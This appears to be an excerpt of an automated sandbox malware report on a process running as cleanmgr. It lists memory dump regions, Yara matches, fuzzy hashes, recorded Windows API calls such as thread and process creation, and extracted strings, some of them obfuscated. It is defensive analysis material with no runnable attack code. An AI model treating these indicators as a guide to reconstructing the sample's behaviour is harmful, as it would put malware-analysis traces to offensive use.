                                                                                                        • Opcode Fuzzy Hash: d0557ac255867ae86f9b145c7fbd3b23d3d33b87b009e2d5e26a5f5476ca9b58
                                                                                                        • Instruction Fuzzy Hash: F1900225261400122145B5594A0454B044D9BD7395395C015F18175D0CC621D9665762
                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000F.00000002.2579148300.0000000004F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 04F30000, based on PE: true
                                                                                                        • Associated: 0000000F.00000002.2579148300.0000000005059000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 0000000F.00000002.2579148300.000000000505D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 0000000F.00000002.2579148300.00000000050CE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_15_2_4f30000_cleanmgr.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: InitializeThunk
                                                                                                        • String ID:
                                                                                                        • API String ID: 2994545307-0
                                                                                                        • Opcode ID: 242a694b2c2a64e0d459637fc438beff7ac14482ca12dbeb69b2eabd79ab0e50
                                                                                                        • Instruction ID: aa83a77cfcff55228c9fa7f5728d85bf5f315d1e9cce520bc7eb57c5423a2738
                                                                                                        • Opcode Fuzzy Hash: 242a694b2c2a64e0d459637fc438beff7ac14482ca12dbeb69b2eabd79ab0e50
                                                                                                        • Instruction Fuzzy Hash: AE900225251400132105B5594B04547004E8BD6395355C021F1417590CD621D9625562
                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000F.00000002.2579148300.0000000004F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 04F30000, based on PE: true
                                                                                                        • Associated: 0000000F.00000002.2579148300.0000000005059000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 0000000F.00000002.2579148300.000000000505D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 0000000F.00000002.2579148300.00000000050CE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_15_2_4f30000_cleanmgr.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: InitializeThunk
                                                                                                        • String ID:
                                                                                                        • API String ID: 2994545307-0
                                                                                                        • Opcode ID: db82dc7e0f215226c6129cf360071a5118e3a1b1fdd54b5e8dae77b21def37dd
                                                                                                        • Instruction ID: 7547468a5d15e17b37d14f4fca1120def871e4c6b9bce4bc7eef4f2d20827276
                                                                                                        • Opcode Fuzzy Hash: db82dc7e0f215226c6129cf360071a5118e3a1b1fdd54b5e8dae77b21def37dd
                                                                                                        • Instruction Fuzzy Hash: 9290023124140812F1807159880468A000D8BD2345F95C015A0427694DCA15DB5A7BE2
                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000F.00000002.2579148300.0000000004F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 04F30000, based on PE: true
                                                                                                        • Associated: 0000000F.00000002.2579148300.0000000005059000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 0000000F.00000002.2579148300.000000000505D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 0000000F.00000002.2579148300.00000000050CE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_15_2_4f30000_cleanmgr.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: InitializeThunk
                                                                                                        • String ID:
                                                                                                        • API String ID: 2994545307-0
                                                                                                        • Opcode ID: a95f0c355303da5e406c76d92d1a885c356e519d2c3e07a8c5d5f95f905d7579
                                                                                                        • Instruction ID: 3eb18dc89bba9ace846e1c7c67f70e3f6db400219be160fd92d7034c47817650
                                                                                                        • Opcode Fuzzy Hash: a95f0c355303da5e406c76d92d1a885c356e519d2c3e07a8c5d5f95f905d7579
                                                                                                        • Instruction Fuzzy Hash: 0A90023124544852F14071598804A86001D8BD1349F55C011A04666D4D9625DE56BAA2
                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000F.00000002.2579148300.0000000004F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 04F30000, based on PE: true
                                                                                                        • Associated: 0000000F.00000002.2579148300.0000000005059000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 0000000F.00000002.2579148300.000000000505D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 0000000F.00000002.2579148300.00000000050CE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_15_2_4f30000_cleanmgr.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: InitializeThunk
                                                                                                        • String ID:
                                                                                                        • API String ID: 2994545307-0
                                                                                                        • Opcode ID: a6d602d11a19afd30b66042cfd283388cc09c9a236160e0e0ebebb8cbbd18627
                                                                                                        • Instruction ID: dedace3267c88c364d3db3f48d9aa0a0f0e35c8d92a3c4f628df44ae4ab182f7
                                                                                                        • Opcode Fuzzy Hash: a6d602d11a19afd30b66042cfd283388cc09c9a236160e0e0ebebb8cbbd18627
                                                                                                        • Instruction Fuzzy Hash: D590023164540812F15071598814786000D8BD1345F55C011A0426694D8755DB567AE2
                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000F.00000002.2579148300.0000000004F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 04F30000, based on PE: true
                                                                                                        • Associated: 0000000F.00000002.2579148300.0000000005059000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 0000000F.00000002.2579148300.000000000505D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 0000000F.00000002.2579148300.00000000050CE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_15_2_4f30000_cleanmgr.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: InitializeThunk
                                                                                                        • String ID:
                                                                                                        • API String ID: 2994545307-0
                                                                                                        • Opcode ID: 53621e42d7395aed7460ac38b2df4e1bd77cf2cf2c7eb14325c0762fd2ea4f74
                                                                                                        • Instruction ID: e4b69a6b626dc960b6395e22fa5c6ba2432824a5a82de0f7a159c8bf971492c5
                                                                                                        • Opcode Fuzzy Hash: 53621e42d7395aed7460ac38b2df4e1bd77cf2cf2c7eb14325c0762fd2ea4f74
                                                                                                        • Instruction Fuzzy Hash: B690026124240013610571598814656400E8BE1245B55C021E14165D0DC525D9926566
                                                                                                        APIs
                                                                                                        • Sleep.KERNELBASE(000007D0), ref: 02EB398B
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000F.00000002.2562192999.0000000002E90000.00000040.80000000.00040000.00000000.sdmp, Offset: 02E90000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_15_2_2e90000_cleanmgr.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: Sleep
                                                                                                        • String ID: net.dll$wininet.dll
                                                                                                        • API String ID: 3472027048-1269752229
                                                                                                        • Opcode ID: f97bb00239020262338b71fa7d85bf15ecbf91f228ba4c0cdfeea7cdef180aca
                                                                                                        • Instruction ID: 8c4207eb8a9612543e6c4cd47dd061783c67e6032aee8822812778fdc595e65a
                                                                                                        • Opcode Fuzzy Hash: f97bb00239020262338b71fa7d85bf15ecbf91f228ba4c0cdfeea7cdef180aca
                                                                                                        • Instruction Fuzzy Hash: C2318EB1A40205BBD714DFA4D881FEBBBB9EF89714F00D51DFA196B280C374A6408FA4
                                                                                                        APIs
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000F.00000002.2562192999.0000000002E90000.00000040.80000000.00040000.00000000.sdmp, Offset: 02E90000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_15_2_2e90000_cleanmgr.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: InitializeUninitialize
                                                                                                        • String ID: @J7<
                                                                                                        • API String ID: 3442037557-2016760708
                                                                                                        • Opcode ID: 61aa6896767157436954f9f18fa1216bef1bca2aa9c0d2bb70d8a87e8a72b776
                                                                                                        • Instruction ID: 152130f4cbc0e54ee310857fcf0c12fbb8f06334afab33772d740f8ed7da4ee6
                                                                                                        • Opcode Fuzzy Hash: 61aa6896767157436954f9f18fa1216bef1bca2aa9c0d2bb70d8a87e8a72b776
                                                                                                        • Instruction Fuzzy Hash: C13130B5A0060AAFDB10DFD8D8909EFB7B9FF88304B108559E915EB214D775EE05CBA0
                                                                                                        APIs
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000F.00000002.2562192999.0000000002E90000.00000040.80000000.00040000.00000000.sdmp, Offset: 02E90000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_15_2_2e90000_cleanmgr.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: InitializeUninitialize
                                                                                                        • String ID: @J7<
                                                                                                        • API String ID: 3442037557-2016760708
                                                                                                        • Opcode ID: 16a19bdd2c5e4f4c722801e0ebcf9e52f8833ecbcc4cfa84b00d087709f81b2e
                                                                                                        • Instruction ID: b9061c92484638e65d75f677d2d3ee3b0980774fdd9cc9abcdabc7baef71ad88
                                                                                                        • Opcode Fuzzy Hash: 16a19bdd2c5e4f4c722801e0ebcf9e52f8833ecbcc4cfa84b00d087709f81b2e
                                                                                                        • Instruction Fuzzy Hash: 9C3130B5A0060AAFDB00DFD8D8909EFB7B9FF88304B108559E905EB214D775EE05CBA0
                                                                                                        APIs
                                                                                                        • FindNextFileW.KERNELBASE(?,00000010), ref: 02EAC50F
                                                                                                        • FindClose.KERNELBASE(?), ref: 02EAC51A
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000F.00000002.2562192999.0000000002E90000.00000040.80000000.00040000.00000000.sdmp, Offset: 02E90000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_15_2_2e90000_cleanmgr.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: Find$CloseFileNext
                                                                                                        • String ID:
                                                                                                        • API String ID: 2066263336-0
                                                                                                        • Opcode ID: 2d6e09ac3f240961328f227ac9e1498a84befef2fd00c8c5c8fa74c31095548f
                                                                                                        • Instruction ID: e4675554b1bce82038a492521f23f40b10bf82d108b1547d8e67034500314537
                                                                                                        • Opcode Fuzzy Hash: 2d6e09ac3f240961328f227ac9e1498a84befef2fd00c8c5c8fa74c31095548f
                                                                                                        • Instruction Fuzzy Hash: C1F08276A40219AFDB10CEA4DC80DFF777DEF84315F10918AF804D6100D7309A519FA0
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000F.00000002.2562192999.0000000002E90000.00000040.80000000.00040000.00000000.sdmp, Offset: 02E90000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_15_2_2e90000_cleanmgr.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: c31645fb7f4e9c244d004ae4f598a1050f4e9a7d7222d42de2aa4d9db8e86051
                                                                                                        • Instruction ID: bbad3cc4587ac1a68ce8843682b3feb324a3676a5d7cb7077692b9f447af82a2
                                                                                                        • Opcode Fuzzy Hash: c31645fb7f4e9c244d004ae4f598a1050f4e9a7d7222d42de2aa4d9db8e86051
                                                                                                        • Instruction Fuzzy Hash: 632177324083CAABC716CE78889A58ABFE5AE53214758D2DCD4D59F1D3C352A40FC791
                                                                                                        APIs
                                                                                                        • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 02EA4372
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000F.00000002.2562192999.0000000002E90000.00000040.80000000.00040000.00000000.sdmp, Offset: 02E90000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_15_2_2e90000_cleanmgr.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: Load
                                                                                                        • String ID:
                                                                                                        • API String ID: 2234796835-0
                                                                                                        • Opcode ID: 1d0f88e0e6ba56f344ef909ba5b018900d3faf01ae7809843121af1e57491e36
                                                                                                        • Instruction ID: 5df651f3cf2e17bdc74c0e85ca881d8fcd15737e37d3cc88955320ae030f6c46
                                                                                                        • Opcode Fuzzy Hash: 1d0f88e0e6ba56f344ef909ba5b018900d3faf01ae7809843121af1e57491e36
                                                                                                        • Instruction Fuzzy Hash: A0015EB5D4020DABDF10EAE0EC41FDEB3789F44308F0091A5A9089B280F670E7088B91
                                                                                                        APIs
                                                                                                        • CreateProcessInternalW.KERNELBASE(?,?,?,?,02EA811E,00000010,?,?,?,00000044,?,00000010,02EA811E,?,?,?), ref: 02EB9630
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000F.00000002.2562192999.0000000002E90000.00000040.80000000.00040000.00000000.sdmp, Offset: 02E90000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_15_2_2e90000_cleanmgr.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: CreateInternalProcess
                                                                                                        • String ID:
                                                                                                        • API String ID: 2186235152-0
                                                                                                        • Opcode ID: 9136f0b4e6f82bae56836d4acb0b58e3eba22f86ad65b3f033c4412c498a3f77
                                                                                                        • Instruction ID: 0c51028607cade030289c9e453f97d692bc7d693438c41df6d8c725924eb7af7
                                                                                                        • Opcode Fuzzy Hash: 9136f0b4e6f82bae56836d4acb0b58e3eba22f86ad65b3f033c4412c498a3f77
                                                                                                        • Instruction Fuzzy Hash: 5001C0B2204148BBCB44DF89DC80EDB77AEAF8C754F508208BA0DE3240D630F8518BA4
                                                                                                        APIs
                                                                                                        • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000), ref: 02E99B85
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000F.00000002.2562192999.0000000002E90000.00000040.80000000.00040000.00000000.sdmp, Offset: 02E90000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_15_2_2e90000_cleanmgr.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: CreateThread
                                                                                                        • String ID:
                                                                                                        • API String ID: 2422867632-0
                                                                                                        • Opcode ID: 3b7d4b814f04344c04c671ab33413f7176abbfd1ecbae4b115fe5f69bcfaf3cd
                                                                                                        • Instruction ID: c0fc860ac32c9bde1b17f6d3a480324458c65de763f821a0ccb14fea3a79439c
                                                                                                        • Opcode Fuzzy Hash: 3b7d4b814f04344c04c671ab33413f7176abbfd1ecbae4b115fe5f69bcfaf3cd
                                                                                                        • Instruction Fuzzy Hash: 53F039732902043AEA2065A9AC02FDBA68D8B85B65F14502AF60CEA181E995B80146E9
                                                                                                        APIs
                                                                                                        • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000), ref: 02E99B85
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000F.00000002.2562192999.0000000002E90000.00000040.80000000.00040000.00000000.sdmp, Offset: 02E90000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_15_2_2e90000_cleanmgr.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: CreateThread
                                                                                                        • String ID:
                                                                                                        • API String ID: 2422867632-0
                                                                                                        • Opcode ID: cb83a367dab39b5069847234c5ebb7d8d28fa269b6426448dfbd31e8547c9bfb
                                                                                                        • Instruction ID: 978437c8a5929bcf0052e3e131535d0041a4dff3383487445ba3e282a7e76349
                                                                                                        • Opcode Fuzzy Hash: cb83a367dab39b5069847234c5ebb7d8d28fa269b6426448dfbd31e8547c9bfb
                                                                                                        • Instruction Fuzzy Hash: 47F092726C03007AE630A6699C02FDB664D8FC5770F245219F61DEB1C1D995B4014AE9
                                                                                                        APIs
                                                                                                        • RtlAllocateHeap.NTDLL(02EA17C9,?,02EB5C8E,02EA17C9,02EB54AE,02EB5C8E,?,02EA17C9,02EB54AE,00001000,?,?,00000000), ref: 02EB952F
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000F.00000002.2562192999.0000000002E90000.00000040.80000000.00040000.00000000.sdmp, Offset: 02E90000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_15_2_2e90000_cleanmgr.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: AllocateHeap
                                                                                                        • String ID:
                                                                                                        • API String ID: 1279760036-0
                                                                                                        • Opcode ID: 57b2a52395c9222767e05ed8cc01738bdf3033cd1b87f39c2aaa5050d618ec99
                                                                                                        • Instruction ID: 7f08cfbeee0673ea414dafa3082de3cc5144f9935d4cd7c747a17b8758148caa
                                                                                                        • Opcode Fuzzy Hash: 57b2a52395c9222767e05ed8cc01738bdf3033cd1b87f39c2aaa5050d618ec99
                                                                                                        • Instruction Fuzzy Hash: 49E09A72290209BBDA10EE59DC41FEB37EDEFC9714F40802AF90CA7241DA30B8118BB4
                                                                                                        APIs
                                                                                                        • RtlFreeHeap.NTDLL(00000000,00000004,00000000,4D17E543,00000007,00000000,00000004,00000000,02EA3B88,000000F4), ref: 02EB957F
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000F.00000002.2562192999.0000000002E90000.00000040.80000000.00040000.00000000.sdmp, Offset: 02E90000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_15_2_2e90000_cleanmgr.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: FreeHeap
                                                                                                        • String ID:
                                                                                                        • API String ID: 3298025750-0
                                                                                                        • Opcode ID: bec87bca31af92aec9494093564906b61a46ba24f88768d571c812d6104144da
                                                                                                        • Instruction ID: f7caacf1a9126fd1f7bd04eca66f231cc414be24d1f1e9ed9aca91be7a15a686
                                                                                                        • Opcode Fuzzy Hash: bec87bca31af92aec9494093564906b61a46ba24f88768d571c812d6104144da
                                                                                                        • Instruction Fuzzy Hash: 07E06572204208BFDA10EE58DC41FEB33ADEFCA710F408419F908A7240C670B8128AB5
                                                                                                        APIs
                                                                                                        • GetFileAttributesW.KERNELBASE(?,00000002,?,?,000004D8,00000000), ref: 02EA818C
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000F.00000002.2562192999.0000000002E90000.00000040.80000000.00040000.00000000.sdmp, Offset: 02E90000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_15_2_2e90000_cleanmgr.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: AttributesFile
                                                                                                        • String ID:
                                                                                                        • API String ID: 3188754299-0
                                                                                                        • Opcode ID: 74d64b19e84213968ec032d2173116221a0167d2bb25c05b82e404f8b3d3bd04
                                                                                                        • Instruction ID: 0bb9b1cde17c25e9e4e6a23c14708ac152e7e26c3b8c5b2367e732eb33622c2d
                                                                                                        • Opcode Fuzzy Hash: 74d64b19e84213968ec032d2173116221a0167d2bb25c05b82e404f8b3d3bd04
                                                                                                        • Instruction Fuzzy Hash: E5E0807119020427FB34B968DC55F76335D5B4472CF188660F91CDF1D2D674F50181A0
                                                                                                        APIs
                                                                                                        • PostThreadMessageW.USER32(?,00000111), ref: 02EA0BA7
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000F.00000002.2562192999.0000000002E90000.00000040.80000000.00040000.00000000.sdmp, Offset: 02E90000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_15_2_2e90000_cleanmgr.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: MessagePostThread
                                                                                                        • String ID:
                                                                                                        • API String ID: 1836367815-0
                                                                                                        • Opcode ID: 4f45d3b15f98f1a87d10c987482c8673ba0065e452b9f7c1615c8f61ff475572
                                                                                                        • Instruction ID: 66b8c79e07bfbd75f1b4b949d273b4d4b8f9f701864a614a3439d75705ea6b78
                                                                                                        • Opcode Fuzzy Hash: 4f45d3b15f98f1a87d10c987482c8673ba0065e452b9f7c1615c8f61ff475572
                                                                                                        • Instruction Fuzzy Hash: 03D01377B4111C76AA1155D5ACC1DFFB75CDB856A9F004067FF08D5140E6615D0607B1
                                                                                                        APIs
                                                                                                        • SetErrorMode.KERNELBASE(00008003,?,?,02EA1AC0,02EB7DEF,02EB54AE,02EA1A8D), ref: 02EA7F83
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000F.00000002.2562192999.0000000002E90000.00000040.80000000.00040000.00000000.sdmp, Offset: 02E90000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_15_2_2e90000_cleanmgr.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: ErrorMode
                                                                                                        • String ID:
                                                                                                        • API String ID: 2340568224-0
                                                                                                        • Opcode ID: 96a082c8fc7b1a472e5406feecd76751cac73892d5484f3ae89210e8a7edc13a
                                                                                                        • Instruction ID: dab7650fd9b328d4032f93824877e7bfa684aec49b007af0cacbe8a8aa357261
                                                                                                        • Opcode Fuzzy Hash: 96a082c8fc7b1a472e5406feecd76751cac73892d5484f3ae89210e8a7edc13a
                                                                                                        • Instruction Fuzzy Hash: 3ED05EB56D42053BFA40EAA58C06F66368D5B55764F048074BA0CEB2C2E965F10049B9
                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000F.00000002.2579148300.0000000004F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 04F30000, based on PE: true
                                                                                                        • Associated: 0000000F.00000002.2579148300.0000000005059000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 0000000F.00000002.2579148300.000000000505D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 0000000F.00000002.2579148300.00000000050CE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_15_2_4f30000_cleanmgr.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: InitializeThunk
                                                                                                        • String ID:
                                                                                                        • API String ID: 2994545307-0
                                                                                                        • Opcode ID: 8d282226533faf545bee2e159dc64272d9c5d5b820e337a56a78df09fd8d718d
                                                                                                        • Instruction ID: 7a2fb0e8143ae6502087f5b80c93dd4468c64e3dcdcd332039143fc267a060ba
                                                                                                        • Opcode Fuzzy Hash: 8d282226533faf545bee2e159dc64272d9c5d5b820e337a56a78df09fd8d718d
                                                                                                        • Instruction Fuzzy Hash: C2B09B71D415C5D5FB11F7604A0871779046FD1755F16C061D2431691E4738D1D2E5B6
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000F.00000002.2578383154.0000000004C70000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C70000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_15_2_4c70000_cleanmgr.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 18e1b8aac43d75179dbab7d3378060503159a53bb0810ffb495670b45dfb7053
                                                                                                        • Instruction ID: e8f124d5de08979fa9b67355d60b8c9cf53a346d11f6a3f40a437318f1aae6a3
                                                                                                        • Opcode Fuzzy Hash: 18e1b8aac43d75179dbab7d3378060503159a53bb0810ffb495670b45dfb7053
                                                                                                        • Instruction Fuzzy Hash: 0941F571618B0D4FD368EF699081676B3E3FB89314F50452DD88AC3252EB74F8468789
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000F.00000002.2578383154.0000000004C70000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C70000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_15_2_4c70000_cleanmgr.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: b85022307eb52872340212391483a53628c6721a0a7fa5cf8daa818d37dcfc95
                                                                                                        • Instruction ID: c62a2f6a23e368c378b24c8d368545cc52ba66a99d527815bee2f5b6ce81654a
                                                                                                        • Opcode Fuzzy Hash: b85022307eb52872340212391483a53628c6721a0a7fa5cf8daa818d37dcfc95
                                                                                                        • Instruction Fuzzy Hash: 9421F27581468D9FEB40FFA8C485AEDBBF1FF49204F04066ED549E7652EB305240C791
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000F.00000002.2578383154.0000000004C70000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C70000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_15_2_4c70000_cleanmgr.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: !"#$$%&'($)*+,$-./0$123@$4567$89:;$<=@@$?$@$@@@?$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@
                                                                                                        • API String ID: 0-3754132690
                                                                                                        • Opcode ID: 02c50c0234f623db2efea0a403c7f4b03f531d025f75be3f98c6f63d2d932bba
                                                                                                        • Instruction ID: b6b33316fd997fbf0c26ffb3f9ec703ec8f129b6b11d7754131a4f79210438da
                                                                                                        • Opcode Fuzzy Hash: 02c50c0234f623db2efea0a403c7f4b03f531d025f75be3f98c6f63d2d932bba
                                                                                                        • Instruction Fuzzy Hash: 379150F04482988AC7158F55A0612AFFFB1EBC6305F15816DE7E6BB243C3BE8945CB85
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000F.00000002.2578383154.0000000004C70000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C70000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_15_2_4c70000_cleanmgr.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: #3Q$ $= $!'&'$!(3@$&=#3$&=#=$'*[:$'='=$3Rcc$3Tvp$;X[G$;_z}$<& $$<X\G$= %3$=+'3$@rur$P{a|$R}wa$^>G&$^_?3$^|iz$az<&$fk(3$g$qXzg$x|:3$|zw3$~v<'
                                                                                                        • API String ID: 0-4076280489
                                                                                                        • Opcode ID: 5b60614ace873508481fc8efb8c42ba93312de29c7730ca177c24cf0dbc9a462
                                                                                                        • Instruction ID: ba0f92b3a0f0b3018ed57a157b5b8bd32f2f2c507cae1add6664db302cafa59d
                                                                                                        • Opcode Fuzzy Hash: 5b60614ace873508481fc8efb8c42ba93312de29c7730ca177c24cf0dbc9a462
                                                                                                        • Instruction Fuzzy Hash: 1A3125B085430CEBDB258F84E580ADEBBB1FF10344F81914DF8096F294D7B18A96CB89
                                                                                                        APIs
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000F.00000002.2579148300.0000000004F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 04F30000, based on PE: true
                                                                                                        • Associated: 0000000F.00000002.2579148300.0000000005059000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 0000000F.00000002.2579148300.000000000505D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 0000000F.00000002.2579148300.00000000050CE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_15_2_4f30000_cleanmgr.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: ___swprintf_l
                                                                                                        • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                                                        • API String ID: 48624451-2108815105
                                                                                                        • Opcode ID: 58f6d695e0519d0d21e8eacc534f65cb5fcf15476cb49bc43472bc27914133f3
                                                                                                        • Instruction ID: 87113f2af58118f60166256b3383fada2e4561393daa84efdb3d5cf4c3e2cfae
                                                                                                        • Opcode Fuzzy Hash: 58f6d695e0519d0d21e8eacc534f65cb5fcf15476cb49bc43472bc27914133f3
                                                                                                        • Instruction Fuzzy Hash: BE51F5B2F00116BFDB10DF98C98097EF7B8BB08244B1581A9E495D3741E634FE529BE0
                                                                                                        Strings
                                                                                                        • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 04FD4655
                                                                                                        • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 04FD4725
                                                                                                        • CLIENT(ntdll): Processing section info %ws..., xrefs: 04FD4787
                                                                                                        • ExecuteOptions, xrefs: 04FD46A0
                                                                                                        • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 04FD4742
                                                                                                        • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 04FD46FC
